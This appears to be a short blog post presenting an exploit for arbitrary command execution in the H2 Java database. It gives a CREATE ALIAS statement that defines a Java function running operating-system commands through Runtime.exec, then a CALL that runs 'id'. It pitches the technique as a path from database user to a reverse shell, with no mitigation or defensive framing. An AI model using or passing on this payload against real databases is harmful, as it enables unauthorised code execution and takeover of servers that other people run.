[Exploit] H2 database Arbitrary Code Execution

Hey there,

H2 database is  an in-memory and pure Java Database. It is known as best DBMS and it is indeed. As we can see it is developed in java so java can be executed in it. For more information check out these links – offical_site, wiki.

Exploiting it manually :

After doing some research i found a simple query which can call shellexec for command injection purpose.

STEP 1 :-

First execute the query which actually runs a java code .

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;

STEP 2 :-

Now call that shellexec and you got command injection.

CALL SHELLEXEC('id')

This can basically help you in Privilege Escalation from db user to reverse shell.

Thanks for reading.

Follow me on twitter : @SpiderSec

Related posts

Leave a Comment

nineteen − three =